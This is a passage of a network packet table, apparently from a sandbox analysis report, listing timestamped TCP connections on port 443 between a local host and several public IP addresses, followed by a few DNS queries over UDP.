                                                                                                                                                                                Oct 25, 2021 18:17:23.250296116 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.250300884 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.250334024 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.250346899 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.250358105 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.250411987 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.250418901 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.250705957 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.250735998 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.250761032 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.250761986 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.250772953 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.250819921 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.251547098 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.251596928 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.251635075 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.251636982 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.251646042 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.251688004 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.251698971 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.251744032 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.252341986 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.252388000 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.252412081 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.252434969 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.252444029 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.252492905 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253282070 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253355026 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253381014 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253406048 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253408909 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253418922 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253422976 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253444910 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253460884 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253485918 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253516912 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253523111 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253534079 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253555059 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253571987 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253578901 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253609896 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253638029 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253663063 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253670931 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253679037 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253711939 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253719091 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253724098 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253762007 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253762960 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253794909 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253822088 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253823996 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253829956 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253865957 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253875971 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253881931 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253905058 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253917933 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.253940105 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.253976107 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254004002 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254004955 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254013062 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254039049 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254057884 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254061937 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254065990 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254106045 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254107952 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254117012 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254158020 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254165888 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254170895 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254206896 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254211903 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254245043 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254275084 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254297018 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254302979 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254329920 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254354954 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254357100 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254364967 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254416943 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254421949 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254468918 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.254468918 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.254515886 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.265865088 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.265916109 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.265918970 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.265929937 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.265961885 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.265989065 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.265996933 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.266056061 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.266264915 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.266316891 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.266341925 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.266365051 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.266380072 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.266390085 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.266434908 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.267240047 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.267271996 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.267298937 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.267309904 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.267321110 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.267350912 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.268165112 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.268255949 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.268266916 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.269043922 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.269073009 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.269109964 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.269120932 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.269153118 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.269737005 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.269773960 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.269808054 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.269818068 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.269846916 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.270694017 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.270761967 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.270772934 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.270816088 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.271565914 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.271610022 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.271644115 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.271652937 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.271687031 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.271725893 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.272495031 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.272555113 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.273389101 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.273447037 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287271023 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287327051 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287353992 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287362099 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287374973 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287400007 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287410021 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287437916 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287448883 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287461996 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287473917 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287499905 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287503958 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287514925 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287539005 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287550926 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287587881 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287590027 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287600994 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287626982 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287641048 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287671089 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287678957 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287691116 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287702084 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287733078 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287760973 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287767887 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287777901 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287801981 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287810087 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287839890 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287848949 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287889957 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.287919998 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.287967920 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.294060946 CEST49752443192.168.2.3104.16.19.94
                                                                                                                                                                                Oct 25, 2021 18:17:23.294090033 CEST44349752104.16.19.94192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.323474884 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.323512077 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.323592901 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.323906898 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.323920965 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.347249031 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.350620031 CEST49755443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.350634098 CEST44349755104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.361192942 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.362145901 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.362382889 CEST49754443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.362401962 CEST44349754104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.363276005 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.363364935 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.371079922 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.371115923 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.371169090 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.371263027 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400012016 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400079966 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.400095940 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400118113 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400162935 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.400177002 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400274038 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400326014 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.400326967 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400345087 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400408983 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.400427103 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400470018 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400538921 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.400547981 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400940895 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.400998116 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.401002884 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.401042938 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.401094913 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.401118040 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.401859999 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.401911020 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.401913881 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.401928902 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.401974916 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.401989937 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.402717113 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.402780056 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.402787924 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.402805090 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.402868032 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.402877092 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.402921915 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.402966976 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.402973890 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.403644085 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.403707027 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.403717041 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415410042 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415484905 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.415493011 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415525913 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415570021 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.415579081 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415682077 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415726900 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.415733099 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415750027 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415795088 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.415831089 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415905952 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.415947914 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.415957928 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.416671991 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.416721106 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.416728973 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.416866064 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.416917086 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.438627005 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:23.438657045 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.438738108 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:23.438987017 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:23.439001083 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.447179079 CEST49758443192.168.2.3104.18.10.207
                                                                                                                                                                                Oct 25, 2021 18:17:23.447208881 CEST44349758104.18.10.207192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.493017912 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.493571043 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:23.493611097 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.494900942 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.494966984 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:23.496695042 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:23.496790886 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.581324100 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:23.581371069 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:23.681334972 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:33.255074978 CEST49745443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:33.255450010 CEST44349745172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:33.255551100 CEST44349745172.217.168.33192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:33.255558014 CEST49745443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:33.255676031 CEST49745443192.168.2.3172.217.168.33
                                                                                                                                                                                Oct 25, 2021 18:17:35.679810047 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:35.680124044 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:35.680185080 CEST44349759216.58.215.227192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:35.680241108 CEST49759443192.168.2.3216.58.215.227
                                                                                                                                                                                Oct 25, 2021 18:17:35.680284977 CEST49759443192.168.2.3216.58.215.227

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 25, 2021 18:17:21.570163012 CEST5280653192.168.2.38.8.8.8
                                                                                                                                                                                Oct 25, 2021 18:17:21.573842049 CEST5391053192.168.2.38.8.8.8
                                                                                                                                                                                Oct 25, 2021 18:17:21.579152107 CEST6402153192.168.2.38.8.8.8
                                                                                                                                                                                Oct 25, 2021 18:17:21.586275101 CEST53528068.8.8.8192.168.2.3
                                                                                                                                                                                Oct 25, 2021 18:17:21.592181921 CEST53539108.8.8.8192.168.2.3
